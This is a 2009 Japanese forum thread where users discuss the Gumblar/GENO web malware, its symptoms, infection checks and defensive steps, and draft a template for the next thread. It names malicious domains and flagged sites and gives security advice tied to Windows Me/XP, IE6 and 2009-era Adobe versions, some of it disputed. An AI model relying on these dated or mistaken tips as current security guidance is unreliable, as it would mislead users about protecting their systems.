831名無しさん@お腹いっぱい。:2009/05/15(金) 08:52:42
このウイルスの怖さを周りや上司にいっても
「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。

これが普通なのかな、ちゃんと説明した自分が空しい。。
832名無しさん@お腹いっぱい。:2009/05/15(金) 09:00:41
>>828
俺、avast単独で使ってるんだけどダメなのか?
833名無しさん@お腹いっぱい。:2009/05/15(金) 09:02:47
俺のところも、前回のラトビアの規制だけして、adobeのバージョンアップはなし。
業務に影響を及ぼしうるadobeのバージョンアップは許可できないんだそうでw
業務用バスターw入れてるから大丈夫とか、もうアボガドバナナと。
834名無しさん@お腹いっぱい。:2009/05/15(金) 09:04:04
>>815
http://www.adobe.com/support/security/#flashplayer
日本のサイトはアップデートが遅い。
最新じゃないのに、最新といってくる。


>>832
FWは入れたほうがいいのでは?


コマンドプロンプトやレジストリ起動不可能っていう情報も、ミスリードさせるSE攻撃かもな。
835名無しさん@お腹いっぱい。:2009/05/15(金) 09:05:13
>>832
FWはルータの内側で使ってるならなくてもいいかもね。
Avast!単体だとマルウェアやスパイウェアの類はスルーされる可能性があるから
入れておいた方がいいと思う。
836名無しさん@お腹いっぱい。:2009/05/15(金) 09:06:58
Avast+UAC+WindowsFWが手軽でわりと安全
837名無しさん@お腹いっぱい。:2009/05/15(金) 09:16:44
>>835
ルータ(ホームゲートウェイ)の内側で使用してるわ

FW(ファイアウォール)って、ルータとかで外部のインターネットと
隔絶されている環境(LANとか)ならもう入っているんでしょ?
838名無しさん@お腹いっぱい。:2009/05/15(金) 09:22:49
>>837
ルータにはポート、プロトコルベースのFW機能はあるけど、自分で設定しなければ
ザルだよ。標準状態ではTeredoが通過しちゃうものも多いし。
839名無しさん@お腹いっぱい。:2009/05/15(金) 09:29:49
本物のウィルスより怖いわ
バックアップとっておくかな
840名無しさん@お腹いっぱい。:2009/05/15(金) 09:35:07
IDがでないから、誰が何を書いているのか分からんな。

>>837
使っているOSは?

ルーターが仮に100パーセント外部からの攻撃は防げたとしても、
内側からのリクエストはスルーするからね。
ブラウザでリンク先をクリックすれば、
ルータに遮断されずに次のページの(外部)情報がローカルに戻ってくるのと同じ方法で
悪さをされないともいえない。

PCに入ったマルウェアが外部に情報を送ったりってのを防げる確立が減る。
FW入れてても、IEとかに偽装されて通信されるんだから、入れたほうが良いよ。

フリー HIPS Firewall OR ファイアーウォール
でググルんだ。
841名無しさん@お腹いっぱい。:2009/05/15(金) 09:40:50
>>840
OSはWinMe
FWってルーターの内側でも別個に入れておかないとダメなもんなの?
俺はavast入れておいたから、もう大丈夫だと思ってたよ
セキュリティソフトってファイアウォールの役割もあるんじゃないの?
842名無しさん@お腹いっぱい。:2009/05/15(金) 09:42:12
Meなんか捨てろ
843名無しさん@お腹いっぱい。:2009/05/15(金) 09:56:02
>>842
2004年に中古PCを買ったとき、プリインストールされていたんだよ
まだ5年しか使ってないんだぞ?ネットゲームとかしない限りは、普通に
ブラウザでHPも閲覧できるし・・・特に問題はないんだが

たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん
844名無しさん@お腹いっぱい。:2009/05/15(金) 09:57:16
知り合いは言っても無駄だから全部人柱、観察対象でオケ。
845613:2009/05/15(金) 09:57:37
>>614-615
ありがとう、調べてみる
846840:2009/05/15(金) 09:57:41
>>841

>FWってルーターの内側でも別個に入れておかないとダメなもんなの?
だから、入れておかないとダメって言ってるじゃん。

>>779と同じ人?
はっきり言って、君のような人がボットネットやマルウェア拡散の踏み台になっているんだよ。
>>779-788
は読んだ?

avastはFW入ってないでしょ?
ウィルス対策とファイアーウォールは別。
ノートンとかウィルスバスターはFWも統合されているけど、ウィルス対策だけを抜き出している製品もある。
avastは抜き出された方と同種であり、セキュリティーの一部を担っているだけ。

ルーターも初期設定で使ってそうだな。 ルーターだと思っていたが、実はモデムだったってオチすらありそうだ。
847名無しさん@お腹いっぱい。:2009/05/15(金) 10:01:21
何か色々あったが3日で直った、多分このウイルスの現象
1、とりあえずIEが満足に使用できなくなる
IEの再インストール?上書き?でとりあえず直る
2、公式ログイン制のオンラインゲームが起動しなくなる
どうやらパスワードの認識が通らなくなる様子、何故通らなくなるのかは知らん
avastのアップデートが出来なかったり、エアーステーションに接続できなくなったり等
3、cmdが使えなくなる、色々方法を探してたときに気づいた
結局cmdは使ってないけどな、復元ポイント早速作っておいたわ

とりあえずスパイウェア削除してavast起動したらシステムメモリ内にウイルス混入してたっぽく
再起動後にスキャンするとか言うのをやったら直ったっぽい
848名無しさん@お腹いっぱい。:2009/05/15(金) 10:03:37
>>846
ルーターであることは確かだよ
光回線だし、モデムだけじゃなくてホームゲートウェイで
インターネットに接続しているから

ただ、初期設定の状態で使っていることは確かだな
ルーターの設定を勝手に弄って、変な設定に変えたらまずいし

とりあえず、もう少ししたらXPのインストールされたPCに買い換えようと考えている
849名無しさん@お腹いっぱい。:2009/05/15(金) 10:04:54
>>848
7にしておこうよ?
850名無しさん@お腹いっぱい。:2009/05/15(金) 10:05:02
>>847
何でその時点の復元ポイント作るんだよwww
悪いことは言わんからOS再インストールしてメール等、思いつくもののパスワード全部変更しとけ。
851名無しさん@お腹いっぱい。:2009/05/15(金) 10:05:47
そうそう、何かの雑誌で「セキュリティソフトは1個だけインストールするのが基本で
複数のソフトを入れると競合が起きてまずい」って書いてあったんだよ
だから、俺はavast一本にして、他のFWとかも一切入れなかったんだ
852名無しさん@お腹いっぱい。:2009/05/15(金) 10:08:38
avastはFW入ってないから競合しようがないと思うが、することあるん?
853名無しさん@お腹いっぱい。:2009/05/15(金) 10:22:19
FWもセキュリティソフトの一種だから、競合起こしたらまずいと思っていたんだが・・・
854名無しさん@お腹いっぱい。:2009/05/15(金) 10:23:56
>>851
それはノートンとかの話でしょ?

それにお前はavastにFWが搭載されていると思っていたんだろうが。


>>849
一刻を争う時に半年後の話をしてどうする。
855名無しさん@お腹いっぱい。:2009/05/15(金) 10:23:57
>>852
対策されてるかわからんが、一昔前はある事もあったよ。
FW単体のほかにウイルススキャンのソフトもやってる会社だったから、他社製品に対して意図的に競合起こしてんじゃねえの?
って言われたりしてた。
856名無しさん@お腹いっぱい。:2009/05/15(金) 10:25:08
もう1回ニフ見てくるか
857名無しさん@お腹いっぱい。:2009/05/15(金) 10:26:42
>>843
中古で買った日から起算して5年とかバカなの?
MEはその名のとおり2000年、前世紀(20世紀)の遺物で
2004年当時はXPに対してSP2が出ている。

おまけに10年前だろうと去年だろうと車やVTや冷蔵庫の性能は大して変わらんが
PCの能力やそれを取り巻く環境(ネット等のインフラ、その利便性と脅威)は
大幅に変わるんだよ。XPSP2もBlasterやSasserの猛威があって
日本中の郵便局でCDを配っただろ。
MEは現時点であらゆるサポートが切られている。
858名無しさん@お腹いっぱい。:2009/05/15(金) 10:27:10
>>855
そうなんだ、d
859名無しさん@お腹いっぱい。:2009/05/15(金) 10:29:00
XP使ってるんだがカスペオンスキャンで感染見つからなければセーフ?
860名無しさん@お腹いっぱい。:2009/05/15(金) 10:31:23
Meが何の略かとかさっぱり忘れてたぜ
861名無しさん@お腹いっぱい。:2009/05/15(金) 10:32:05
つーかよく9x系未だ使ってられるよな。
システムリソース気にしながら作業なんて
もう考えたくねえ
862名無しさん@お腹いっぱい。:2009/05/15(金) 10:35:30
>>854
> >>849
> 一刻を争う時に半年後の話をしてどうする。

だってこれからXP買おうとしてる人にVISTA勧めるのもなぁ
863名無しさん@お腹いっぱい。:2009/05/15(金) 10:36:12
ニフもGENOも問題なくなってるのか
馬は警報きた
864名無しさん@お腹いっぱい。:2009/05/15(金) 10:37:37
夏過ぎに7にアップグレードできるVISTA搭載機は出るとは思うが、
この馬鹿は懲りずに中古買いそうだ。
865名無しさん@お腹いっぱい。:2009/05/15(金) 10:47:42
>>843
>たった、5年で捨てるとか、買い換えるとか、車とかTV,冷蔵庫じゃありえん

Windows Meは車検切れ。
製造のMicrosoftしか車検はできず
そのMicrosoftがWindows Meはもう車検しませんと言っている。
866名無しさん@お腹いっぱい。:2009/05/15(金) 11:01:02
>>747
大塚製薬に謝れ!!
867名無しさん@お腹いっぱい。:2009/05/15(金) 11:04:05
まあPCは特殊分野だからねえ
F1マシンに例えると今期のマシンが最高速度300km/hだったのが来期は600km/h
その翌年には1200km/hになってるようなもの
ちょっとおかしな世界なのよマジで
868名無しさん@お腹いっぱい。:2009/05/15(金) 11:04:51
>>863
馬て何?
869名無しさん@お腹いっぱい。:2009/05/15(金) 11:08:12
>>748
NTTだけ反応するなあ
870名無しさん@お腹いっぱい。:2009/05/15(金) 11:12:59
この程度ならVista UACを使うまでもなく、ルーター+Win2k+で問題ないでしょ。
871名無しさん@お腹いっぱい。:2009/05/15(金) 11:14:46
>>868
トロイ奴だなw
872名無しさん@お腹いっぱい。:2009/05/15(金) 11:21:05
>>871
あ、なるほどw
873名無しさん@お腹いっぱい。:2009/05/15(金) 11:30:40
>>843
世界が違うんだよ。家電と。解らないならパソコン辞めろ
874名無しさん@お腹いっぱい。:2009/05/15(金) 11:40:35
>>870
そうだな
Vistaは誰でも簡単にセキュリティが保てるようにしただけの物だから上級者なら2000でも十分だな
ただ2000のアップデートももうじき終わるのが痛いな
875名無しさん@お腹いっぱい。:2009/05/15(金) 11:42:55
>>847

おいおいw

ある日莫大な請求がいってもしらんぞ
876名無しさん@お腹いっぱい。:2009/05/15(金) 11:44:53
XPのサポートっていつまで続くの?
877名無しさん@お腹いっぱい。:2009/05/15(金) 11:46:07
2014年まで
878名無しさん@お腹いっぱい。:2009/05/15(金) 11:48:11
Windows2000やXPでセキュリティを保つよりVista以上のOSに
ルータ、アンチウイルス、PFWなどを入れて各種の最新のパッチ入れたほうが楽だろな
俺はWindows7に期待している
879名無しさん@お腹いっぱい。:2009/05/15(金) 11:54:39
スレの伸び方が怖いお。

ノートンとかが対応しないのは横柄?
それとも、まだ全然脅威でない、ってな見解?
880名無しさん@お腹いっぱい。:2009/05/15(金) 11:55:54
VISTAはユーザーにつかいにくいとフルボッコ状態だったけど
ウイルスからフルボッコされないって皮肉なもんだね
881名無しさん@お腹いっぱい。:2009/05/15(金) 11:57:48
まあ、それだけシェアが少なくて相手にすらされてない現状なんじゃね?
シェアがVISTA系のみならUAC回避の方向で作られただろうしさ。
882名無しさん@お腹いっぱい。:2009/05/15(金) 11:58:38
>>880
Macと同じだろ。
不人気だからウィルス作者にも相手にされない。
もしVistaのシェアが激増すれば攻撃されまくるだろうけどね。
Vistaは表面上、セキュリティ厳重に見えちゃうから、
もし攻撃対象になったら素人どもが阿鼻叫喚だと思う。
883名無しさん@お腹いっぱい。:2009/05/15(金) 12:03:34
XP Pro SP2 Firefox3.0.10 です

WindowsUpdate
PDFリーダーを最新にする
AdobeFlashを最新にする
ウイルスバスター2008
NoScript
これだけじゃ防げないの?

884名無しさん@お腹いっぱい。:2009/05/15(金) 12:03:35
OSは最新を使っていればセキュリティはまちがいないな
885名無しさん@お腹いっぱい。:2009/05/15(金) 12:10:01
>>883

当面はだいじょうぶだろうけど油断禁物
886名無しさん@お腹いっぱい。:2009/05/15(金) 12:10:11
>>883
OSに関してはMicrosoftUpdateのほうでおねがいします
なんでSP2なのかわからんけどSP3を当ててね
887名無しさん@お腹いっぱい。:2009/05/15(金) 12:10:32
>>883
とりあえず今のところは防げるんじゃないの
しかし、優秀なGENOウイルスメンバーは、
セキュリティの盲点を新たに突いてやってくるから恐いんだよ
888名無しさん@お腹いっぱい。:2009/05/15(金) 12:11:34
>>859
それだけじゃセーフとはいえない
>>879
横柄とかそんなアホな問題じゃなくて
中身が変わりすぎて対応しきれないだけ
889883:2009/05/15(金) 12:16:00
>>885-887
ありがとう、油断はできないんだねw

>OSに関してはMicrosoftUpdate
WindowsUpdateとなんか違うんですか?

>なんでSP2なのかわからんけど
SP3入れて不具合っての良く見かけたもんで躊躇してますw
890名無しさん@お腹いっぱい。:2009/05/15(金) 12:17:22
891名無しさん@お腹いっぱい。:2009/05/15(金) 12:22:58
ttp://www3.atword.jp/gnome/2000/01/13/block-list/
↑サイトを見てルータでIPフィルタリングしたいんだけど、送信/受信両方とも登録しなきゃだめかな
892名無しさん@お腹いっぱい。:2009/05/15(金) 12:26:21
>>889
SP3に関して、今はあら捜しが好きな奴が大々的に言ってるだけ。
まあ、SP2出たばっかりの頃を経験してるから、アップデート躊躇する気持ちもわかるけどね。
893名無しさん@お腹いっぱい。:2009/05/15(金) 12:40:41
PayPalのお金がなくなってた!

こいつのせい!?
894名無しさん@お腹いっぱい。:2009/05/15(金) 12:41:15
>>891
送信だけでいいと思うよ
895名無しさん@お腹いっぱい。:2009/05/15(金) 12:42:49
>>893
俺も戸棚に置いといた茶菓子が無くなってた!

こいつのせいに違いない!
896名無しさん@お腹いっぱい。:2009/05/15(金) 12:44:14
>>891
某メーカーのルータはフィルタリングしても効いてないやつあるから注意な
897名無しさん@お腹いっぱい。:2009/05/15(金) 12:45:00
メインはfirefoxでIEはめったに使わないんだけど
IE6のままだと心配?7か8にしたほうがいいのかな?
898名無しさん@お腹いっぱい。:2009/05/15(金) 12:45:09
>>895
おい!
さっきまで腹減ってたのになんだか腹一杯になってるぞ!
お前のせいか!
899名無しさん@お腹いっぱい。:2009/05/15(金) 12:46:51
>>897

IEは他のウイルスにも狙われてるから危険
900名無しさん@お腹いっぱい。:2009/05/15(金) 12:48:19
>>897
せめて7にしとけばいいんでない?
8は入れたけど7に戻したわ。

>>899
>>897はupdateとかでたまに使う程度だと思う
901名無しさん@お腹いっぱい。:2009/05/15(金) 12:52:02
>>900
やっぱりIE6じゃまずいか・・・7入れてみるよ

updateとかでたまに使う程度だけど
902名無しさん@お腹いっぱい。:2009/05/15(金) 12:53:28
>>901
firefoxにieのプラグインを入れたらいい
903名無しさん@お腹いっぱい。:2009/05/15(金) 12:56:00
もし個人HPとか作成していたらそれもやばいのか
904名無しさん@お腹いっぱい。:2009/05/15(金) 12:57:43
>>903
そりゃヤバイだろ
905名無しさん@お腹いっぱい。:2009/05/15(金) 12:58:22
>>902
結局それieエンジンになるから同じことじゃね?
906名無しさん@お腹いっぱい。:2009/05/15(金) 12:58:30
大手企業さえああいうことになってる訳だし〜
907名無しさん@お腹いっぱい。:2009/05/15(金) 12:59:00
ちょっとまてよ…
firefoxにieのレタリングをアドオンをすれば
限りなくieの脆弱性をもつfirefoxになるのか?どうだろ
908名無しさん@お腹いっぱい。:2009/05/15(金) 13:02:51
>>902
アホや、アホがおる
909名無しさん@お腹いっぱい。:2009/05/15(金) 13:04:05
アドオン入れてたかもしれん
削除しとこー
910名無しさん@お腹いっぱい。:2009/05/15(金) 13:04:32
>>902
それが一番危ないんだよwww
911名無しさん@お腹いっぱい。:2009/05/15(金) 13:04:58
IEかどうかを調べているから純正IEよりはマシじゃね
912名無しさん@お腹いっぱい。:2009/05/15(金) 13:05:02
>>908
スマンorz
913名無しさん@お腹いっぱい。:2009/05/15(金) 13:05:20
本プラグインの現バージョンでは、IEエンジン使用時にSSLを使用したサイトを鍵マークなどで
区別する手段が用意されておらず、IEエンジンのまま普段訪問しないサイトを利用するのは
セキュリティ上の不安がある。
そのため現状では、“Gecko”エンジンを主に使い、よく利用するが「Firefox」などに対応していない
サイトを利用する際にIEエンジンに切り替える、といった使い方にとどめておくことをお勧めする。

ttp://www.forest.impress.co.jp/article/2006/01/16/ietab.html
914名無しさん@お腹いっぱい。:2009/05/15(金) 13:06:42
>>907
なりません
915名無しさん@お腹いっぱい。:2009/05/15(金) 13:07:06
もうね危ないからネットのケーブルはずしちゃお。
これで気兼ね無くネットができ……アレ? 
916名無しさん@お腹いっぱい。:2009/05/15(金) 13:07:58
深刻なはずなのに、たまに和むレスがあるなwww
917名無しさん@お腹いっぱい。:2009/05/15(金) 13:09:44
http://dxd8.com/archives/192/

ホームページ制作会社が感染というは危険がありますか?

発注先の会社が感染しているか確認する方法はありませんか?
918名無しさん@お腹いっぱい。:2009/05/15(金) 13:10:31
ソースみりゃ
919名無しさん@お腹いっぱい。:2009/05/15(金) 13:10:53
>>917

www

あるわけないだろw

直接聞いてみたら?
920名無しさん@お腹いっぱい。:2009/05/15(金) 13:13:48
>>917

まじかよ。

危険もなにもやばすぎるだろ…。

ウイルス入りのページばらまかれたらたまらないな。

制作会社のソースを確認したほうがいいぞ。
921名無しさん@お腹いっぱい。:2009/05/15(金) 13:14:31
ありがぞうございます

ソースというのはどこで見ればいいのでしょうか?
922名無しさん@お腹いっぱい。:2009/05/15(金) 13:15:26
>>921

冷蔵庫に入ってるんじゃね
923名無しさん@お腹いっぱい。:2009/05/15(金) 13:17:30
>>889
SP2へのアップデート時にはかなりの変更があったのでトラブルが続出したけど
SP3は基本的にセキュリティ修正なのでだいたい問題ないはず

WindowsUpdateはOSのみ。MicrosoftUpdateはOS、Office他。
Office入ってなくてもWindowsUpdateじゃ更新されないものがあるんで
こちらを推奨だそうです。
http://www.microsoft.com/japan/technet/prodtechnol/microsoftupdate/default.mspx
924名無しさん@お腹いっぱい。:2009/05/15(金) 13:17:52
www

マジレスすると今すぐ電話して聞け
925名無しさん@お腹いっぱい。:2009/05/15(金) 13:18:50
JAVA切っちゃってみんな絶対動画サイト見ないの?
俺は我慢できんからつべとニコ許可しちまった
926名無しさん@お腹いっぱい。:2009/05/15(金) 13:20:00
>>925
JavaじゃなくてJavaScriptのほうね
927名無しさん@お腹いっぱい。:2009/05/15(金) 13:21:55
>>923
ありがとう、Office入ってないけど考えてみます
928名無しさん@お腹いっぱい。:2009/05/15(金) 13:22:21
ここにどう動作してるのか詳細に説明してあるな。
ttp://ilion.blog47.fc2.com/blog-entry-128.html

このタイプはVISTA系以外でIE系なのか調べて該当したら、
Adobeの脆弱性を利用して感染している様だ。

次はどんな亜種が出てくるのやら
929名無しさん@お腹いっぱい。:2009/05/15(金) 13:22:43

制作会社感染はまずすぎますね


定期age
はじめてきた人はここで確認してください

http://www3.atword.jp/gnome/
930名無しさん@お腹いっぱい。:2009/05/15(金) 13:23:48
>>925
同じくw

加えてyahooとgoogleも許可してるけどまずいのか?
931名無しさん@お腹いっぱい。:2009/05/15(金) 13:24:57
JavaScriptは切ってないな
リーダーの方をアンインストした
又インストすれば良いし
932名無しさん@お腹いっぱい。:2009/05/15(金) 13:26:01

感染するとどんな挙動になるんです?
933名無しさん@お腹いっぱい。:2009/05/15(金) 13:26:35
>>928

IEだとめちゃ危険じゃん…。
934名無しさん@お腹いっぱい。:2009/05/15(金) 13:28:41
>>932

ある日突然パスワードが盗まれます
935名無しさん@お腹いっぱい。:2009/05/15(金) 13:31:20
もうやだ…検索するのさえ怖い
936名無しさん@お腹いっぱい。:2009/05/15(金) 13:32:59
ttp://www3.atword.jp/gnome/2000/01/13/block-list/
ここのListをPG2や葱用にBlock.txt作ったけど要る?
937名無しさん@お腹いっぱい。:2009/05/15(金) 13:34:29
類をみない凶悪さだ思うんだが、思ったより騒がれていないな。

もっと取り上げられてもいいはず。

IE系で無自覚で感染しているやつが多そうで怖いよ。
938名無しさん@お腹いっぱい。:2009/05/15(金) 13:35:10
>>936

くらはい
939名無しさん@お腹いっぱい。:2009/05/15(金) 13:35:12
大体解決したね
もう次スレいらないね
940名無しさん@お腹いっぱい。:2009/05/15(金) 13:35:54
久しぶりに見たわそれ
941名無しさん@お腹いっぱい。:2009/05/15(金) 13:36:50
次スレそろそろ立てるシーズンだけど
テンプレ考えようか
942名無しさん@お腹いっぱい。:2009/05/15(金) 13:36:51
>>937
大きくニュースで取り上げられたら普通の人も怖さに気付く
943名無しさん@お腹いっぱい。:2009/05/15(金) 13:37:12
パスワード盗まれるだけで
PCに挙動がおかしくなったりしないの?
PC異常きたさずにパスだけ抜かれるなら
怖いな
944名無しさん@お腹いっぱい。:2009/05/15(金) 13:37:17
解決してねーだろw

ここのやつらは解決してるだろうが。
945名無しさん@お腹いっぱい。:2009/05/15(金) 13:37:55
>>928
IEじゃなくても危険ということか…
946名無しさん@お腹いっぱい。:2009/05/15(金) 13:39:08
>>945

どこをどう読んだらそうなる?
IE系がターゲットにされてるんだよ

IE以外も油断はできない早さで進化してるけどな
947名無しさん@お腹いっぱい。:2009/05/15(金) 13:42:12
挙動おかしくなるて書いてたよ
948名無しさん@お腹いっぱい。:2009/05/15(金) 13:43:29
>>946
928を書いた人か?
949名無しさん@お腹いっぱい。:2009/05/15(金) 13:43:42
もうイヤだ。
こんなインターネッツ。
950名無しさん@お腹いっぱい。:2009/05/15(金) 13:44:29
>>948

違うよw
951名無しさん@お腹いっぱい。:2009/05/15(金) 13:45:03
再起動でけた
小林製薬のHP見たことあるからびびってたんですよ
952名無しさん@お腹いっぱい。:2009/05/15(金) 13:45:45
ふっつーにOperaでも感染しそうになったよ
Adobe ReaderのJavaScriptを切っていたから助かったみたいだけど
もちろんUA偽装なんかしてないぞ
953名無しさん@お腹いっぱい。:2009/05/15(金) 13:46:21
>>943
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

これ天婦羅に揚げた方がいいんじゃないか?
954名無しさん@お腹いっぱい。:2009/05/15(金) 13:46:42
また新種きてるってこと?

そろそろ次スレ準備お願いします。
955名無しさん@お腹いっぱい。:2009/05/15(金) 13:47:11
>>941
感染を疑った人の報告をテンプレで統一化するのは?

【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

こんな感じにすれば診断する側も
見やすい気がするお
956名無しさん@お腹いっぱい。:2009/05/15(金) 13:47:14
【解決】GENOウイルススレ 4【してません】
957名無しさん@お腹いっぱい。:2009/05/15(金) 13:47:40
>>953
これとあテンプレ候補よろ〜

立ててくるから
958名無しさん@お腹いっぱい。:2009/05/15(金) 13:48:24
とりあえずそんなもんかな?

よろしくー。

一般人が騒ぎ出す頃が一番やばそうだね。
959936:2009/05/15(金) 13:49:06
960名無しさん@お腹いっぱい。:2009/05/15(金) 13:49:38
テンプレとしてこれに追加で良いかな

感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ ★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/

GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
961名無しさん@お腹いっぱい。:2009/05/15(金) 13:50:29
>>5 のサイトもいれてほしい
962名無しさん@お腹いっぱい。:2009/05/15(金) 13:52:02
>>959

ありがと

これも追加してもらってもいいかな?
963名無しさん@お腹いっぱい。:2009/05/15(金) 13:52:49
製薬会社のメールマガジン登録してるんだけど
これも開いたら危ないのかな…
964名無しさん@お腹いっぱい。:2009/05/15(金) 13:53:41
とりあえず残りのレスはテンプレに入れてほしいものを書き出そう
965名無しさん@お腹いっぱい。:2009/05/15(金) 13:54:24
966名無しさん@お腹いっぱい。:2009/05/15(金) 13:55:10
次スレです。
追加のテンプレを考えてください。
随時追加します。

GENOウイルススレ ★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
967名無しさん@お腹いっぱい。:2009/05/15(金) 13:57:57
おつー

>>19 もたのんます
968名無しさん@お腹いっぱい。:2009/05/15(金) 13:58:10
まず最新バージョンにする
Adobe Flash Player 10.0.22.87
Adobe Reader 9.1.1(5/12アップデート)

AdobeReader設定で、
「PDFをブラウザに表示」「Adobe Javascripを使用」
っていうところのチェックボックスを外す
ほとんどのAdobeReaderプラグインの脆弱性を狙ったウイルスにやられなくなる

--
これはいれたほうがいいかな?
969名無しさん@お腹いっぱい。:2009/05/15(金) 13:59:08
 ・IEを使用しない
 ・FirefoxならNoScriptを入れる

これも最初に入れてくれ
970名無しさん@お腹いっぱい。:2009/05/15(金) 14:02:07
テンプレに、So-netの記事と小林製薬他の「まともな告知をしている所」のリンク張っといたら?
説明するのに楽だろ。
971名無しさん@お腹いっぱい。:2009/05/15(金) 14:02:08
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
972名無しさん@お腹いっぱい。:2009/05/15(金) 14:03:14
【OS】 Windows Me
【使用セキュリティソフト】 avast! 4.8 Home Edition
【疑った理由】 106hotline.com/guidance/kiso_syougou.html にアクセスしようとしたら、avastが反応したため
【症状】 avastが反応し、警告音と共に「JS:Redirector-H2(トロイの木馬)を検出した」と表示されたので、
    驚いてすぐにIEを閉じたが、「ウイルスチェスト」への移動が「エラー」となり、感染したか未然防止できたか不明
【確認手段】 「TemporaryInternetFiles」の中身を全部削除した後、avastで全ドライブをチェック後、再起動
【結果】 ウイルスの検出無し、再起動は正常、CPU使用率も正常、MS-DOSプロンプト、regedit起動可能
973名無しさん@お腹いっぱい。:2009/05/15(金) 14:03:47
1.Adobe Flash Player のアップデート
2.Adobe Acrobat Reader のアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript OFF
5.危険IPのブロック
974名無しさん@お腹いっぱい。:2009/05/15(金) 14:06:49
ネットがリアルに浸入してきたんだ!
975名無しさん@お腹いっぱい。:2009/05/15(金) 14:06:51
>>XP / 2000 の方は sqlsodbc.chm をチェックしてください。

この sqlsodbc.chm ってVISTAにもあるがスルーでいいのか?

格納されてる場所は違うけども
976名無しさん@お腹いっぱい。:2009/05/15(金) 14:07:41
テンプレ完成したらまとめwikiに貼っておこうよ
次スレまでに状況変わるにしても叩き台にはなるし
977名無しさん@お腹いっぱい。:2009/05/15(金) 14:10:12
>>972
お前はもう黙ってろw
978名無しさん@お腹いっぱい。:2009/05/15(金) 14:11:41
おつー
ひととりOKかな?

Meの人はあきらめてくださいw
979名無しさん@お腹いっぱい。:2009/05/15(金) 14:11:42
一応大体のものは貼ってきた
被った人すみません。>>966
980名無しさん@お腹いっぱい。:2009/05/15(金) 14:14:06
まとめサイト>>129
981名無しさん@お腹いっぱい。:2009/05/15(金) 14:16:09
982名無しさん@お腹いっぱい。:2009/05/15(金) 14:16:59
>>199関連も必要なのかな
983名無しさん@お腹いっぱい。:2009/05/15(金) 14:17:44
>>980
すまん入れていなかったので今テンプレ続きにした
984名無しさん@お腹いっぱい。:2009/05/15(金) 14:21:33
プリフェッチ機能を無効 
でググったらIEもできるみたいだけど、やったほうがいいんかね
985名無しさん@お腹いっぱい。:2009/05/15(金) 14:22:07
落ち着いたみたいなので質問

感染した場合、ワクチンやM$のパッチじゃ回復できないの?
986名無しさん@お腹いっぱい。:2009/05/15(金) 14:24:02
>>985
感染してたら、今のところ
クリーンインストール&各種PASS変更 推奨
987名無しさん@お腹いっぱい。:2009/05/15(金) 14:24:51
>>986

ありがとう
やっぱりそうか…やばいね
988名無しさん@お腹いっぱい。:2009/05/15(金) 14:26:11
gumblar.cn の検索結果 約 84,200 件中 1 - 10 件目 (0.10 秒)
989名無しさん@お腹いっぱい。:2009/05/15(金) 14:26:24
>>968
javaは見つかったが
「PDFをブラウザに表示」の項目がどこかわからない
990名無しさん@お腹いっぱい。:2009/05/15(金) 14:27:29
>>989
確かインターネットの下。
俺はreaderいれてないから確認できないすまん
991名無しさん@お腹いっぱい。:2009/05/15(金) 14:28:07
>>986
感染しているかどうかは、どうやって判定すれば良いの?
992名無しさん@お腹いっぱい。:2009/05/15(金) 14:28:34
環境設定→インターネット→Webブラウザオプション
993名無しさん@お腹いっぱい。:2009/05/15(金) 14:28:40
994名無しさん@お腹いっぱい。:2009/05/15(金) 14:30:34
検出してくれるセキュリティソフトも追加しないか?
付け焼き刃だけど

 ・Avast!
 ・Kaspersky
995名無しさん@お腹いっぱい。:2009/05/15(金) 14:33:47
>>994
こんな感じでいいのかな?

現時点で確認出来る対策ソフト 
・Avast!

・Kaspersky
996名無しさん@お腹いっぱい。:2009/05/15(金) 14:33:55
 ・ウイルスバスター2009

もかな

ソースネクストとかのはやばそうだなw
997名無しさん@お腹いっぱい。:2009/05/15(金) 14:34:40
>>991
sqlsodbc.chmのファイルサイズとMD5をチェック
998名無しさん@お腹いっぱい。:2009/05/15(金) 14:34:44
どんどん亜種が出てるみたいから対策ソフトも追いついてない
999名無しさん@お腹いっぱい。:2009/05/15(金) 14:35:21
>>995

※亜種の進化が速いため過信は禁物

とか書いたほうがいいかも
1000名無しさん@お腹いっぱい。:2009/05/15(金) 14:35:37
アンラボも対応済みらしいけど・
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。